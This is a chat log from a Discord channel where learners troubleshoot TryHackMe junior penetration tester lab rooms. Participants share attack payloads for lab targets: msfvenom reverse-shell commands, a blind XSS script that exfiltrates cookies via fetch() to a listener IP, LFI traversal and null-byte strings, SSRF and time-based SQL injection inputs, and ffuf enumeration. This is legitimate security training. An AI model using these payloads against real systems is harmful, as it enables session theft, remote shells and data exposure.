#junior-pentester-path
@sharp yoke use the request catcher provided in the lesson, i tried using an NC listener yesterday and the automated function on the site wasn't working properly.
yeah I saw reddit post
thanks
here @brazen notch https://www.reddit.com/r/tryhackme/comments/qfq648/jr_pentesterxss_room/
|| sudo nmap -sS -T1 -p 8080 10.10.171.60 -vv ||
thanks
I'm curious who built the room.
ah, strategos
I'm really curious what server-side stuff it's doing to get the flag
i tried both http and https and still couldn't get it to connect to my nc listener, i had to use the request catcher provided by the lesson.
Loved the Linux privesc capstone that was good fun
Also @calm swallow it'll work with just the ||-sN flag||
i got it, thanks
I'm backing up to the burp stuff because I skipped it
I remember now why I usually skip burp rooms on thm
i find burp to be so hands-on that write ups and walkthroughs are difficult to "get"
how can I request catcher :/
I'm onto win privesc next then I'm done with the path
I'll be there soon, i suspect
yeah but how am i gonna use it
i have no idea
wait
btw ticket ending time when ?
tomorrow i think
Question about nmap: Isn't setting the urg flag good because it's much faster? Like instead of using -sA or -sW I could use --scanflags URGACK to get the results faster
yes i know how to use nmap pretty good but my question was is using URG flag faster than using only ACK
hm
have you tried using them together?
was there a difference?
URGACK was faster than ACK
ig you can use it since it's faster
you can use it and it's faster, but it's also really easy to detect.
not a lot of webapps set the urg flag
hi all!! i have a problem on the netsec challenge room, about the nmap scan which needs to avoid IDS detection. even without scanning i got 4% or even more sometimes, and a few times i avoided detection (reset packet count and after that i launched nmap) and still didn't get any flags on the webpage
yeah i thought so, but on challenges people usually use the most aggressive flags there are lol
i did a CTF last week that was dropping some of those scans
it really depends on what is going on
it's a little buggy. you'll need to refresh and reset until you get the reset message
what scan are you using?
i tried so many xD
put it in here with a spoiler tag
you're good
i just tried with more simple and got the flag rn
are you sure null and ack scan work together?
6 h on this xD
to be honest i tried multiple mix of flags
so, make sure you're not running any other scans (like hydra)
refresh the page a few times and make sure the reset message is there
and you can actually run a scan as fast as || -T3 || on this box
i tried to put ||all flags to ACK with -sA --scanflags ACK|| etc etc
your use of || -sN || will work
Did you do it on the attackbox or your own machine? As the hint says, with the attackbox it's working better.
yeah now i have it with just ||NULL|| and T3 is the default
stealthy 2-hour scans aren't within the scope of that challenge room (|| -sS -T0 ||)
you don't even need to bother with that
you understand it better than the challenge is really asking for, tbh
on the burpsuite intro room -- which dropdown are they asking about on task 9?
|| burpsuite makes me grumpy ||
|| OWASP ZAP for the win! ||
thanks. I suspect they're looking for one in foxyproxy, but I'm just not sure which dropdown they would want unless it's in ||patterns|| somewhere
I usually use burpsuite to handle the server response editing
I am stuck on WinPrivEsc Unquoted Service Path
I am not getting a session on the multi/handler
Intercept a request in burp and right click into that request, you will find that dropdown sub-menu there.
deleted saltiness
intercept a request and right click
don't want it to spread
the answer is there
thanks for the nmap too
something-something hashtag not my first thm burp room
i did it with cobaltstrike windows service exe
Ahh
you don't have any session or the session dies quickly?
not receiving the session at all
give me the name and the path you use in private or here with spoiler tag
and the msfvenom command used
but normally they give it iirc
What payload are you using with msfvenom?
|| msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > common.exe
C:\Program Files\Unquoted Path Service
Common.exe||
the payload that is in msfvenom I set for the multi handler as well
ok, time for me to take a break and cook dinner. have fun, all
enjoy your meal
i did it with meterpreter like i said and migrate -N explorer.exe ASAP and after tried with cobaltstrike win service but all seems good from your side
i try it rn
remember to migrate quickly since it will die
i will try when VM is up with your payload
So got the remote flag, but can't get the first one. This is really getting. - X post in burp? And no content type header.
I even changed the payload to meterpreter in msfvenom and handler. I am still not catching it when stopping and starting service
let me try a different port
everything worked for me
i tried with your payload and it work
when you launch the service you use powershell or cmd?
because in powershell you must use sc.exe not sc
lol
that happens
that's enough for me tonight, need to sleep, sad to not have at least a 1 month voucher when finishing all the rooms in the path
good night all
Going through the Local File inclusion module. am i right in saying http://webapp.thm/index.php?lang=etc/passwd bypasses filtered keywords (such as /etc/passwd) + also if the function adds .php at the end of the input
depends on the filter, and the null byte works only on PHP 5 and lower
if the developer decided to filter keywords such as /etc/passwd and then if the function added .php at the end of the input, adding %00 would bypass those two, am i right in saying that? and yes depending on the PHP version
if php5 and less you will bypass the .php added at the end that's right
sorry if i am keeping you up hahah, just saw your goodnight all message
Ok gotcha, just wanted someone to clear that up for me. was not 100% sure
but if he only filters with a regex that searches for the word etc or for the /, it will not be bypassed
i hope im clear, im bad at explaining things xD
Hi! Can someone help me with the SQL injection room from this path, please?
This is what i am referring to in regards to the question i asked
Got my Certificate!! Thanks @last shadow
Gave +1 Rep to @last shadow
Hey people, I'm trying to complete RFI inside File Inclusion in the Junior Penetration Tester Course but the command doesn't seem to do anything
post your command with || on each end of it
this didn't work or I did it wrong
you can also highlight text in discord and press the eyeball to the right to add the tags
could i get a hint for ssrf task 2?
i have changed 'api' to 'server' and i see how the request responds but i can't seem to figure out how to implement the flag 9
where is that eyeball?
are you on Discord on your desktop?
I am
after you type or paste your command, highlight the text and a little box comes up above it
post your whole url here with spoiler tags
thank you
Gave +1 Rep to @night hearth
| https://website.thm/item/2?server=api.website.thm/flag&x=&id=9 | this was the first one i have now literally just changed api to server | https://website.thm/item/2?server=server |
you are close
i see that it changes to server.website
to do the spoiler tag you need || on each side
oh okay
right so that is correct
sorry
but it needs more
i dont know how to implement the flag
the hint says that it needs to be at the end of your payload
okay yes
so mix your 2 attempts together
you need to add the end &x= btw
i see what its saying
if you use the hint button it says this
i just said i see it says server.website
@sharp yoke
Phew! After pulling out what little hair I have left, I finally completed the RFI Playground task! Glad the payload I used worked, but I'm a bit confused why the one I tried before ||<?PHP gethostname(); ?>|| didn't work, please could someone explain?
lol
because i dont know the format it needs to be so ive brute forced a number of different variations
@wet gulch I did the same thing at first. that is why it shows you the request at the bottom
i used the &x= because it turns it into a parameter and in the example it is never used "at the end" of the url
the examples were a little confusing
example says stock?server=api.website.thm/api/user&x=&id=123
How come ||gethostname();|| doesn't work but the correct one (which I won't spoil for others) does? I've read the descriptions for both at php.net and I don't understand the difference
so i thought if you're looking for user 123 you'd change it to look for flag 9
thats why I said the example is confusing to the task at the end
i don't understand the syntax so i've brute forced. i get what it's doing, not how to write it
ok so what is your latest attempt?
to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter
yes
that is why it goes at the end of your payload
now that you understand that did you solve it?
if not, let us know where you are at with your payload
none of the examples show it at the end of the payload...
okay that's great, i still don't understand the syntax
or how to write it i get the payload is the file im looking for
you're requesting to get server.website.thm/flag?id=9
thats the payload
i get it i just dont understand the syntax
and what happened when you did server=server
so take it a step further
add more than server=server
then see if you understand what it is doing
@wet gulch did you get it?
had to step away from my pc
guys I am stuck on an authentication bypass task4 for hours any help, please??
yes
what have you done so far
I don't know what I did wrong but I didn't get the flag on tickets
so you made an account, and ran the curl requests, with the second one edited to match your account?
Hey guys just looking for a hint for "Vulnerability Capstone" last question:
||I've grabbed the ruby and the python2 scripts but neither of them seem to work right. I've installed all deps and created a virtualenv for good 'ol python2 but nothing seems to work right||
I had the same issue. Try using the one from the hint
Yeah the ||ruby one ?|| i was trying that I should probably just give up and use ||burp|| but I really wanted to get it going
||Ahh, for the Ruby script, did you set up a netcat listener to listen for the reverse shell?||
Python, not Ruby, myb
Ahhhhhhh I'm a dope, thanks @night hearth || i see what you mean now, i missed the error about non-numeric -> listener is a better idea ||
Gave +1 Rep to @night hearth
when all else fails || base64 it || @night hearth
any idea why this is not working? im on the remote shell part in file inclusion
have you got a firewall up by any chance ?
Nahh no firewall, im gonna restart the machine and try again
i never have much luck with remote shell/code execution. really annoying
restarting the machine did the job
Anyone received this message before? Don't know why this happened, nor should my sub expire in the next couple of days
i just had the exact same message completing the same room, how strange
Ok, i feel better now
ok looks like tickets just stopped
Anyone on the File Inclusion Task 8 Challenge?
On the second flag
Using curl works but I can't do anything past that
Yeah but I can't edit them
I click and it deselects for me
like it's just for show
Will try
right click edit as html?
Go to "Storage"
Thank you!!!
Gave +1 Rep to @wispy nimbus
Two hours in this
was I supposed to get a reverse shell in the exploit vulnerabilities room?
Guys I only have access to the Admin page, nothing else?
did you use burp for the previous questions?
No, I haven't learned it yet
Play around with that cookie. Change the value to your name for instance and see what happens.
I just realized, we're not supposed to have a name in this machine
At least I didn't think so
I changed the path but it didn't work as well
What else can you change in that Storage tab if it is not the Path, to get LFI?
Also note y'all: The ticket event has ended.
Pay attention to the error message how it reflects the change you made to the value of that cookie.
MACHINE_IP/challenges/chall2.php?file=/etc/flag2 only shows the same admin page
Yep, it's ended
Yeah
cool! well, congrats to all the winners!
ya
try lower casing that cookie
same
@modest arch just need a nudge I believe
Keep playing with that cookie. And again, see how the error message reflects your change.
Is it possible to change? It always comes back to Guest if I change anything
srry im still stuck
Change its value in the storage tab and refresh the page.
change ur browser ig
it might help
It's the attackbox one
in the metasploit intro || eternal blue msf, where is this flag.txt? I've been to every bloody folder at this point i think ||
I am not familiar with the AttackBox.
You have to be able to change the value of the stored cookie and refresh the page.
okay i am done thanks @modest arch
Gave +1 Rep to @wispy nimbus
So you want to see the "Get the flag" message or get the flag? I think the arrows in that screenshot are quite a fair hint.
yep
Close. But you are not using everything you've learned.
bruh soo close
I'll keep trying
you can see that the function adds a .php at the end of your entry, how would you bypass this?
yes it's what I just noticed
Nice profile pic by the way
did u get flag3?
are you stuck on flag3?
ya all signs are filtered
They may be, the way that you are attempting, but there are other ways
did you research $_REQUEST, to see what its uses are?
doing that
i have gone through php.net manual
not getting
so it accepts GET, POST, and HTTP HEADER
maybe try a different type of request to the page
Well this sucks. I thought we had the whole of the 31st to get more tickets...it looks like no one won any of the more lucrative prizes
i.e. Cert vouchers
still on that
not getting
@urban whale i am stuck too
i am on get the flag page
which task?
file inclusion challenge 2
I was literally typing that haha
i'm still on that challenge 3
try a ||POST request||
the default isnt POST ???
suit
I personally used curl on that challenge. Let me try it in Burp
it works
i solved challenge 1 using that only
yea Burp can do it also
even easier in Burp
ok so make sure to use the spoiler tag || on either side of the spoilers. what did you do in Burp so far
did you get flag3?
yup
play with that cookie and keep an eye on what error is produced
||I did that with 2 method 1 just converted GET into POST + Content-Type: + file=...
another
make a normal Get req. and intercept that response and changed the GET parameter to POST in page source ||
it's easy on burp, curl can also do that
i was decoding the URL from that time lol
RCE
so you will need to create a webserver on your attackbox to host it
Python3 has a very simple way to do so if you google it
not sure if this is the right channel to ask but having troubles with this question . Use grep on "access.log" to find the flag that has a prefix of "THM". What is the flag?
i did but i dont think that while doing RCE the txt file is hosting ... but it is visible in my browser
are you doing a room in the Jr Pentester path?
nah it's under the linux fundamentals
what does your payload that you put in the browser look like
not quite sure that I understand the question. The flag will be THM..... it could be THM-123456789 or THM{theflag}
just starts with THM so you will need to use grep to find a line that starts with THM
Are you VPNing in on your own box for the challenges?
yes
I believe you may be using the wrong IP for your machine. you should have a 10.10.x.x IP
u mean the file hosted IP ?
yes
okay i am trying with attackbox
that should make things much simpler
Hello, I am working on the Linux PrivEsc (https://tryhackme.com/room/linprivesc) Room. Not able to understand how to run the CVE on the server. Could anyone please help?
tried scp to upload the CVE file, but then cannot locate the file on the server due to denial of permissions.
How are you trying to locate the file? But either way, with scp you anyways specify the directory in which you upload the file, so I'm a bit unsure why you can't locate the file.
ok maybe I am not using scp well... I opened the directory where I saved the file... then scp FILENAME karen@SERVER... I think I didn't mention the directory... the thing is default "pwd" on the server is at "/", do I need to mention it? @shadow echo
What's the full scp command you tried?
that one I mentioned is the full command... scp 37292.c karen@10.10.110.108
Okay, well then I would first check if you have write permission to /home/karen (which you normally should have) and then use scp 37292.c karen@10.10.110.108:/home/karen
If you have access to that machine just:
cat apache2/access.log | grep -i "thm"
-i flag meaning not case sensitive
is there any way I could know the upload has been a success or not?
Not sure if scp will give you a reply, I barely use scp. But you can simply check the folder you uploaded it to afterwards.
well I actually don't think I have write permissions... let me see...
no... "Could not chdir to home directory /home/karen: No such file or directory"
What task of that room are you on?
Okay, then you simply have to search for a different directory where you have write permissions to, maybe try /tmp
scp 37292.c karen@10.10.192.92:/
Stuck at this, no response... the shell is not coming back to usual after finishing of operations, unlike the last command w/o the directory.
just now it replied connection timed out, re-trying.
ok sure... working on it then
Btw, you know what the pwd command does, right?
denotes the current directory where the shell is at, right?
It prints out the current working directory. So if you are inside /home and you enter pwd, it will print /home. If you are inside /home/whatever/whatever2 it will print /home/whatever/whatever2 . And only if you can access a directory, doesn't automatically mean you can write to it.
XSS Task 8 (Blind XSS Practical)
I am connected to THM VPN through Kali running in VM and do not get any traffic through nc.
(Is the port in the script supposed to be identical to the port in the nc flag?)
Just to remind everyone, The XSS Task 8 box is buggy and you might have to restart it to give you a proper http request. Try using the thm catcher thing if standard nc doesn't work
If you can't get a request while manually opening the ticket after your created it, then there is something wrong. The port has to be the same in you xss payload, yes. If it's only about that the ticket is not getting triggered by the staff member, then you might restart the target machine or use the attackbox or request catcher.
I am not sure about my configuration. The IP and the port in the JS script have to be like my IP:PORT showing under tun0 in ifconfig, right?
oh right...
In Command Injection room, for detecting blind RCE, it says one way is to force an output.
For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file's contents.
but isn't the whole point of blind RCE that we weren't supposed to (maybe in some cases we CAN'T?) see any verbose output? If the file is then read using cat, how will I even know that the server executed the cat command? Even if it does, what is the use? I won't be able to see it
Have you specified a port with nc ? If yes, then you have to use the port as well. And yes the IP will be your tun0 IP, IP:PORT will be the right way then.
I followed the instructions and setup nc with nc -nlvp 9001 . I am missing some knowledge here. If the JS fetches the cookie with specifying the IP:PORT of the user visiting the website, why and how would it get sent to port 9001?
Read the breakdown of the payload in task 8 again. The fetch() command makes an HTTP request. The IP:PORT is where the http request will go to, so therefore it's always your IP:PORT as you want to catch these requests.
If so I would have to set up nc on the port showing in ifconfig under tun0 I guess and not 9001?
I'm not sure what port you are referring to, there should be no port being displayed with ifconfig?
Sorry. Meant ip address
Well if you talk about the /16 after your IP, that's the suffix for your subnet, as far as I know.
So your IP will be without the /16
I entered into the JS script my IP with 9001 as the port. </textarea><script>fetch('http://{my_tun0_ip}:9001?cookie=' + btoa(document.cookie) );</script> and nc is running on 9001. I opened that ticket and nothing shows up. Back to square one.
You removed the { } right?
what you mean by entered into the js script??
because you just need to put it in the message
you must enter the payload in the message of the ticket
I was referring to the JS script entered into the message.
ok
Did that.
so after that just a nc -lvnp 9001 must work
try on the attackbox if you were on your pc
hi all, i forgot
I am just a bit stubborn trying to understand why it does not work.
sometimes quotes or double quotes are messed up when copy/paste
it can be that or not the good ip, verify your tun0 ip too
Maybe try to restart the target machine, as I don't see why that wouldn't work.
yeah +1 try restarting the machine or your vpn or try the attackbox
if ip is good, normally 2min after posting your ticket you must have a connection to your nc listener
The tickets giveaway is finished?
did someone win the OSCP or eJPT??
I think everything is set up right.
Tried already...
yeah everything seems fine
have you still got tickets, or not ?
Are you using a VM?
Yes, VirtualBox
try with the attackbox
And openvpn is only running inside your VM and not on your windows host (or whatever host OS you use) as well?
grrr i was near some voucher grrrr
Actually, openvpn is running also on my host OS (Fedora). (Different VPN though)
Well then I would try to turn that off to see if that solves your issue. Although if it's not the THM vpn shouldn't matter as far as I know, giving it a try might be worth it.
the easy way to verify is the attackbox
if he has a callback on the attackbox nc listener, there is a problem from his vm network
I thought that tickets would be granted till today inclusive.
@tropic dust Let's keep the conversations to continue here, so everyone can see it and maybe help you out. So what's the CVE you found? I assume you are on task 5, right?
yes task 5, disclosing the CVE will actually be a spoiler
Then write it and delete the message after I saw it. Or put spoiler tags.
how to do that?
select the text and the latest icon
You can put spoiler on text. Anyways, just delete it then. Have you read the instructions inside that cve? It's explaining you on how to run it.
Hi!! trying to understand PATH Privilege Escalation. Don't need any hint, just learning. I execute the script from /usr/bin and from /home/murdoch, and i can get root. But if i copy the script to /tmp, permissions are denied. Why is that? Any advice?
Is /tmp a directory non executable?
check ls -l /tmp and if the script is set to be executable
yes it is
the issue is that if i copy the script to the /tmp directory, it doesn't do the job. instead, if i execute the script from /usr/bin or from /home/murdoch, it works
and i am trying to guess why is that
Did not solve that issue. In AttackBox , which IP I am supposed to enter? docker0, eth0, lo?
eth0 on the attackbox
I also had some issues with nc when I did that task... in the end I used the listener they provided me
Is /usr/bin and /home/murdoch in the PATH variable and /tmp not? If yes then that's the reason. Just an idea, not even sure on what task you are
yeah ok, that's right. got it. Ty fontaene
Gave +1 Rep to @shadow echo
OK. nc caught a cookie, but after decoding it, it's still not the right answer. Any clue?
Did you open the ticket on your own after creating it?
Yes. And I decoded it. Tried entering with "session=" and w/o. Nothing worked.
Then it's your own session cookie that you received. But at least you verified that you receive the request. You have to create the ticket and wait until the script that's somewhere behind gets triggered and is opening the ticket as a staff member. Something with that triggering is buggy, so as long as you know now that your xss payload is working fine, you just have to wait 1 - 2 mins; if you're not getting anything, try to restart the target machine or use the request catcher.
Done. Thanks a lot.
Gave +1 Rep to @shadow echo
After I am done, I still do not understand how this works. Why does this script send a local session cookie and a staff session cookie to nc? I am missing something fundamental here.
If you XSS yourself, you'll get your own token
The script will always be executed in the browser of the person that is opening the ticket (in that example). So if you open the ticket in your browser, it will be executed there, regarding to the break down what each of these commands is doing. If someone of the staff members is opening the ticket, the script will be executed in his browser and therefore grabs his cookie and sends it. The individual cookies are also stored in the browser.
I got that. Actually, I did receive also my own token. But how does this work that I receive a staff-members token??? Is there some automation behind the scenes on this website that every ticket gets opened from the backend?
Now things are starting to make sense to me. I was wondering the whole time what am I trying to achieve with this JS. Thanks.
Gave +1 Rep to @idle bison
Additional question: Why do I have to encode the cookie in the XSS and later decode it? Why can't I just fetch it the way it is?
To make sure it gets transmitted correctly.
What would happen if I would not do that?
Well maybe for that session cookie nothing, but as far as I know, if there are some special characters in the initial cookie, it could get interpreted the wrong way and therefore not receive the cookie in the way it was. But I would rather suggest you look that up on your own, in order to make sure I'm not talking bs
I'll let you know. Thanks.
Gave +1 Rep to @shadow echo
Hi fam, I'm working on xssgi (last task: task8 practical of blind xss) room of Junior pentest path, and I'm pretty certain that my answer is correct but it says wrong.
How did you receive the session cookie? By opening the ticket you have created?
I am stuck in File Inclusion Lab, Challenge 2. I have managed to get admin access manipulating the cookie. I am trying different combinations of url in the browser to gain access to flag2 by using ?file= such as ../.. walkthrough including ....//....// or %00 at the end. I have even tried to include a POST form based on the code of Challenge 1. No luck. Could someone hint me if I am on the right track or am I missing something? Should I use curl or can this be solved simply manipulating the url path to the file?
play around with the cookie value to see how the webpage reacts.
thru nc sir
You mean the value of admin or the other values? Thanks.
I meant, how did you trigger the xss? After you have created the ticket with the xss payload. Did you open the ticket ?
ahh yes.
If you think over it again, how would you get the staff session cookie if you trigger it on your own, if it's getting executed by your own browser, you will only get the session cookie of yourself.
The value of the cookie itself. So if you open the dev tools to check out the cookie, you see the field/tab that's called value.
Yes, I already obtained access as admin by changing admin and value to true. I have refreshed and have admin access and it tells me I can go to capture the flag. I can now obtain the flag, but when I include in the url ?file=../../../../etc/flag2 (and different variations) I am not able to view anything in the browser. Not even by inspecting the html. You are still saying I should work on the cookie or am I doing something wrong when typing in the url? Thanks.
Gave +1 Rep to @shadow echo
Yes, work on the cookie value to see how the site reacts to it.
should i just be patient?
If the automation that's going to trigger the ticket to be read as staff member is not going to do it within 2 - 3 mins I would try to restart the target machine, use the attackbox or the request catcher. It is a bit buggy I think. At least you verified by opening the ticket on your own that the payload is working.
okok. will try to restart my machine. hang on sir, thanks by the way
Gave +1 Rep to @shadow echo
hi guys
I'm trying to do the metasploit module, and on the rev_shell.elf task I'm getting this error
||Segmentation fault (core dumped)||
On the machine I'm supposed to get a meterpreter
When I launch the ||./rev_shell.elf||
This is my handler
|| msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
LHOST 10.13.23.79 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
0 Wildcard Target ||
I'll look at that right now
I think it is, let me check
This is the command for the .elf file
|| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf ||
The one on the module
I see that
Ok, let me try again
Will tell you the results
If I use another name different from Guest or Admin, for example root, I get the following Error: Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37 If I then try to traverse using =file? I still get the same error. I am lost. I need help or for someone to provide me a link or course to understand what I am missing.
Ok, it's done. Thank you!!!
Gave +1 Rep to @steel nymph
Sorry I meant: Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37 I also tried ?lang= and failed. By room you mean the actual documentation of the course (Task 4) or some other place?
challenges/chall2.php?file=../../../../../../etc/flag2 Is what I was using.
but not able to transfer exploit to target machine
So after changing the cookie value, are you even refreshing the page? As for your example when you change it to root, your warnings should look different.
Yes, with admin I get the welcome admin but when I change it to root and refresh(several times) I get: Warning: include(includes/root.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Warning: include() [function.include]: Failed opening 'includes/root.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37
Okay, so what does that warning tell you then? Warning: include(includes/root.php)
Yes, I also modified the url to include challenges/includes/admin.php and then tried traversal without luck.
Not sure why you are doing something with the url when you get that warning. Warning: include(includes/root.php) If with that warning it is unclear, you should reread the previous tasks.
OK, I tried a different approach and using file:///etc/ I see now the files and directories including the passwd file but there is no sign of flag2, unless it is hidden. And even trying to do file:///etc/flag2 reveals nothing.
It is also showing hidden files.
I don't know what else to try to get flag2. Are you saying that I should continue to try by using another method? In any case, if using file:// reveals the etc folder and I don't see the flag2 in it, perhaps it may be because it is simply missing?
Thanks for your patience lassi. If I input /etc/flag2 as the value of the cookie I get the following error: Warning: include(includes//etc/flag2.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Gave +1 Rep to @steel nymph
I don't understand this server... I do a little work and after sometime the shell just stops taking any input... this is happening only on this server...
And yes, how to enable a spoiler alert on text?
Or if on windows client you can highlight your text then click on the eye logo
or also "/spoiler"
also... running the CVE on the server opens up a mini-shell with root priv, but it doesn't run half of the commands like cd or cp...
really stuck on task 5 of Linux Priv Esc room, someone out here to guide?
Room: File Inclusion
in the last section if I try to access the challenge 2 it says "refresh the page please" and i don't know how to fix that
yea nothing changes
even clearing the cache is useless
nop
i only get response cookies tho
yes exactly.
this is what i get
i tried without extensions and i get the same result
i tried changing them but I always get the same response cookies
I'll try
the download did give me a .c file... I compiled and ran it. the object code file exists in the server.
still nothing
i forgot to add the spoiler mb
and how do i input multiple values?
ooh
ok got it
thanks
Hi guys. I'm dealing with Windows Privesc room Task5 DLL Hijacking. I'm on the last step where I have to log in as jack, but I don't have da option to switch to another user. I also tried with ssh..
Found it. Rereading it and understanding how include works helped. Thanks!
Gave +1 Rep to @steel nymph
Are the tickets not available anymore? I thought today is the last day
I am in the Authentication Bypass section task 3 but it gives me an error
yeah me too but it ended the midnight i guess
Right. Thanks
Gave +1 Rep to @steel nymph
Gave +1 Rep to @steel nymph
make it one name per line and no commas
nope
yup, that and maybe try to create a new file with a different name, maybe like "valid.txt" (but don't forget to change it in the ffuf command as well)
i tried every username like this but still gives me error
have you tried rebooting your machine?
Can I try to do it on your target machine, to check if it's an issue with your machine?
of course but how ?
yes like 5 times
I mean I see the IP in the screenshot, so if you haven't restarted the machine I can just run ffuf
nope give it a try
thank you ❤️
If you run curl 10.10.10.10/whoami on your own machine's terminal, what's the IP you get as a response?
what is 10 10 10 10 ? :/
Just a thm machine for vpn purpose
i wait but nothing shows
So can you access 10.10.10.10 in your machine's browser?
ovvvvvvvvvvvvv waitttttttttttttttt
gosh
don't start my vpn thing
yes now
it's working
Okay, so what's the IP you get as a reply to the curl command?
Alright
i didn't run the openvpn thing at first
Ye
I am in need of help with this question, been working on it for 2 days, is it a joke?
Use grep on "access.log" to find the flag that has a prefix of "THM". What is the flag?
what are you trying?
i try doing a grep "THM" access.log
figured with it being a prefix I'm looking for something that says THM
very close
noooo ITS NOT
lol
fuck let me figure it out then
lol
or is it some bull shit i am not typing right ? lol
hmm so using grep it would just look for THM if there is any
are you in the same directory as accesslog
so i am not supposed to be in the root
okay ty
i might be overthinking this soo badly and going to piss me off l8r lol when i figure it out
you need to launch the machine in task 3 of linux fundamentals
your attackbox does not have the file access.log
OMG LOL
see that the error you are getting is no such file
yea
if you do the ls command you can see the files in your current directory
i get it now
eheheh it happens sometimes
well i kno to start my task 3 window lol
what have you done differently for it to work?
Is there a workaround for Task 5 in Advanced Nmap?
I'm entering the command as they suggest but the password is incorrect.
scp pentester@my-machine-ip:/home/pentester/* .
To copy files
It prompts for password and I enter given password THM17577
Permission denied, please try again
Pls helpppppp
What room?
Hi guys, I'm a little confused about challenge 1 of the LFI part (https://tryhackme.com/room/fileinc) on Task 8.
For the first Challenge, we need to do a POST search to reveal the /etc/flag1 file.
I use postman, and I made a POST request with the link
http://10.10.17.108/challenges/chall1.php?file=/etc/flag1
And it does not work ...
Can you tell me why?
You need to understand the difference of a GET request and a POST request. As the way you are trying to send the parameter is supposed to be used in a GET request and not in a POST request.
Ok thanks bro i will check that thank you @shadow echo
Gave +1 Rep to @shadow echo
Thank you @steel nymph
Ye, that might be something they could fix, anyways they mention it has to be in the request body. But it's good if you add that info in case he is doing it with burp
Yes it works thanks to your answers guys, and thanks to the request body
Thank you!
Hi, it was the victim machine's ip
Hey everyone, so I am currently struggle bussin through task 8 of the SQLi room.
It appears to be a topic of discussion, might someone be able to review/confirm the logic?
So I am able to get the 5 second response time with the following:
|| admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'password' and COLUMN_NAME !='id'; ||
Appreciate it @steel nymph
I haven't gotten any ticket since yesterday evening. Is this expected? I thought it was extended till 31st Oct?
I have a question i don't see my kali user after windows update
and the terminal appearance has changed
now i see
this is sus
Morning guys, have a great day!
this has been useful for me! @analog quartz you too
Did you ever get past this? I'm having the same error
I'm working on Practical : Command Injection under the Command Injection box. None of the commands I'm inputting are returning anything, is this room bugged?
Yes
Pings the server. Sends back 4 packets. Problem arises when I input any injection code from the cheat sheet. Nothing posts. Perhaps I'm misusing it?
Yeah, attempting Linux commands is getting nothing back. I.E. ping 127.0.0.1, whoami 127.0.0.1, etc
Hey, is there any way I can get a web view of my curl requests / tamper cookies from browser? I'm at file inclusion challenge 2
Yep, dev tools
Hmm how do I do that? I'm able to read the request along with the cookie that goes with it but I cannot find a way to edit it
If you are using Firefox check the "Storage" Tab
in curl i think it is a -H "<name>:<value>"
Oh nice I think I got it, and yes that's correct for curl, thank you @vital lake !
Gave +1 Rep to @vital lake
So the task is wrong? I will try it, thank you!
Gave +1 Rep to @steel nymph
All i needed was to stop the machine, refresh the page and restart the machine.... it's working now, but thanks!
Anyone able to help with SQL injection task 7?
I'm trying to enumerate the column names but no matter the character I use to do so, it returns false. If I take it a few steps back and do the table names it works though.
I even scrolled a little bit further into the section and saw the column names, then tried searching for the first character of those and matching with column_name = parameter and it still returned false.
Is this a bug in the lesson or am I dumb?
@steel nymph disregard... figures the second i post for help i'd see the error -_-
i forgot to change the dumb information_schema
any fixes for xss task 8?
What you mean with fix?
I mean is there any more info about the automation of the admin? I restarted the machine three times, on the first attempt listened for ~30min then two times for 10min
Oh, have you tried if you receive the request if you open the ticket on your own? So just to verify your payload is working?
Yes, I have received my own cookie
Okay, then maybe try it on the attackbox or with the request catcher. People reported it's working better with these 2 options.
okay, i'll try that now
Who is the author of Exploit-DB?
johnny long should be the answer
but it is not
any hints?
Johnny Long was the creator and author of Google Hacking Database.
edited for clarity
where should I look for the answer?
when looking for information about a website or people associated with it I always look for an 'about us' page or something similar.
after about 15 min on attack box - nothing (only my own cookie), i'll try request catcher next
okay
Anyone have any issues with the crontab task in the linux privilege escalation room??
What is the most common mistake because I don't see where I am making the issue
Who the **** creates a backup files for a crontab and doesn't make it executable. The hell kinda admin is this
could someone give me a hint for xss task 8 i have started netcat on 9001 and am posting || </textarea><script>fetch('http://10.10.224.220?cookie=' + btoa(document.cookie) );</script> || in the text area of the ticket and not getting anything on my port
what about the payload
i tried adding :9001 after the ip
|| </textarea><script>fetch('http://10.10.224.220:9001?cookie=' + btoa(document.cookie) );</script>|| like this?
or adding a / before the ?
oh the ip i am using rn was wrong but when i was doing it last night i know i was using the right ip but i still wasn't getting it, I'll try again
okay i switched the ip and i am still not getting anything, I'll still wait i guess
and send what?
the payload?
my vpn or the box
okay
yes it is
thats my tun0
yeah
idk maybe it's bugged
its okay
okay
i tried last night and it wasn't working
maybe I'll try the catcher
got it with the catcher
wait maybe not
i got this
when running this || </textarea><script>fetch('http://a791fd7267ad5efeaa23890b083a763c.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script> ||
yeah because i opened the page where it says "listening for requests ..."
it's just http requests from my ip getting the html
i just get the dns
yeah if i run || </textarea><script>fetch('http://a791fd7267ad5efeaa23890b083a763c.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script> || i get
i got it
finally lol
thank you
thanks for your help as well
Gave +1 Rep to @steel nymph
so thx
Gave +1 Rep to @drifting drum
I'm quite new to using ffuf - When executing the command it's encountered 1 error ( -u flag or -request flag is required). Even though I've declared it with the full URL afterwards. Any suggestions?
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x" - H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.170.82:80/customers/signup -mr "username already exists" -o valid_username.txt
I attempted without port also ^
Cheers bud - I'll do some trouble shooting.
